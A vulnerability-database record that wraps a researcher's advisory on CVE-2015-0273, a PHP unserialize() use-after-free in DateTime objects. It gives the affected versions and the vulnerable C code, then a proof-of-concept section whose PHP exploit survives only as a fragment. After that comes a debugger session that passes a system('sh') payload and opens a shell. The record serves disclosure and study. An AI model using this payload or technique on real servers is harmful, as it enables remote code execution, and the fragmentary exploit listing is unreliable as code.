{"uuid": "4a851e87-8da7-470d-a408-eaa7b348032a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2015-0273", "type": "seen", "source": "https://gist.github.com/infernalheaven/1512d272a18678d67abd80c1781537fd", "content": "#Use After Free Vulnerability in unserialize() with DateTime* [CVE-2015-0273]\n \nTaoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.1.29 - Release Date: 2015.2.20\n \n> A use-after-free vulnerability was discovered in unserialize() with DateTime/DateTimeZone objects's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or execute arbitrary code remotely.\n\nAffected Versions\n------------\nAffected is PHP 5.6 < 5.6.6  \nAffected is PHP 5.5 < 5.5.22  \nAffected is PHP 5.4 < 5.4.38  \nAffected is PHP 5.3 <= 5.3.29\n\nCredits\n------------\nThis vulnerability was disclosed by Taoguang Chen.\n\nDescription\n------------\n\n``` \nstatic int php_date_initialize_from_hash(php_date_obj **dateobj, HashTable *myht)\n{\n\tzval             *z_date;\n\tzval             *z_timezone;\n\tzval             *z_timezone_type;\n\tzval              tmp_obj;\n\ttimelib_tzinfo   *tzi;\n\tphp_timezone_obj *tzobj;\n\n\tz_date = zend_hash_str_find(myht, \"date\", sizeof(\"data\")-1);\n\tif (z_date) {\n\t\tconvert_to_string(z_date);\n\t\tz_timezone_type = zend_hash_str_find(myht, \"timezone_type\", sizeof(\"timezone_type\")-1);\n\t\tif (z_timezone_type) {\n\t\t\tconvert_to_long(z_timezone_type);\n\t\t\tz_timezone = zend_hash_str_find(myht, \"timezone\", sizeof(\"timezone\")-1);\n\t\t\tif (z_timezone) {\n\t\t\t\tconvert_to_string(z_timezone);\n\n...\n\nstatic int php_date_timezone_initialize_from_hash(zval **return_value, php_timezone_obj **tzobj, HashTable *myht TSRMLS_DC)\n{\n\tzval            **z_timezone = NULL;\n\tzval            **z_timezone_type = NULL;\n \n\tif (zend_hash_find(myht, \"timezone_type\", 14, (void**) &z_timezone_type) == SUCCESS) {\n\t\tif (zend_hash_find(myht, \"timezone\", 9, (void**) &z_timezone) == SUCCESS) {\n\t\t\tconvert_to_long(*z_timezone_type);\n\t\t\tif (SUCCESS == timezone_initialize(*tzobj, Z_STRVAL_PP(z_timezone) TSRMLS_CC)) {\n\t\t\t\treturn SUCCESS;\n\t\t\t}\n\t\t}\n\t}\n\treturn FAILURE;\n}\n```\n \nThe convert_to_long() leads to the ZVAL and all its children is freed from memory. However the unserialize() code will still allow to use R: or r: to set references to that already freed memory. There is a use after free vulnerability, and allows to execute arbitrary code.\n \nProof of Concept Exploit\n------------\nThe PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.\n\n```\n>= 8;\n\t}\n\treturn $out;\n}\n\n?>\n```\n\nTest the PoC on the command line, then any PHP code can be executed:\n\n```\n$ lldb php\n(lldb) target create \"php\"\nCurrent executable set to 'php' (x86_64).\n(lldb) run uafpoc.php assert \"system\\('sh'\\)==exit\\(\\)\"\nProcess 13472 launched: '/usr/bin/php' (x86_64)\nsh: no job control in this shell\nsh-3.2$ php -v\nPHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25) \nCopyright (c) 1997-2014 The PHP Group\nZend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies\nsh-3.2$ exit\nexit\nProcess 13472 exited with status = 0 (0x00000000) \n(lldb) \n```", "creation_timestamp": "2026-05-08T22:10:30.000000Z"}